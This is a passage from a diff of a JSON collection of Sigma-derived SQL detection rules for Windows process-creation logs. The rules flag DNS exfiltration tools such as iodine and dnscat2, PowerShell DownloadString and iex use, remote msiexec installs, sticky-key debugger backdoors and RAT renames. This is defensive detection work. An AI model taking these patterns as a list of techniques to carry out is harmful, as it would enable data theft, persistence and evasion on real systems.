by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "status": "experimental", + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Unlikely" + "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Use Short Name Path in Image", + "id": "a96970af-f126-420d-90e1-d37bf25e50e1", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (NewProcessName LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR NewProcessName LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate admin scripts" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Use Short Name Path in Image", - "id": "a96970af-f126-420d-90e1-d37bf25e50e1", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "New Service Creation Using PowerShell", + "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "status": "test", + "description": "Detects the creation of a new service using powershell.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (NewProcessName LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR NewProcessName LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" + "filename": "proc_creation_win_powershell_create_service.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "status": "experimental", - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "author": "Tim Rauch", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ "attack.lateral_movement", - "attack.t1021" + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" - }, - { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Suspicious Msiexec Quiet Install From Remote Location", - "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "medium", - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", "status": "test", - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Winzip", + "Other self-extractors" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", + "id": "bab049ca-7471-4828-9024-38279a4c04da", "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "author": "Janantha Marasinghe", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE '%VBoxDrv.sys%' ESCAPE '\\') OR (CommandLine LIKE '%startvm%' ESCAPE '\\' OR CommandLine LIKE '%controlvm%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_virtualbox_execution.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.t1112", 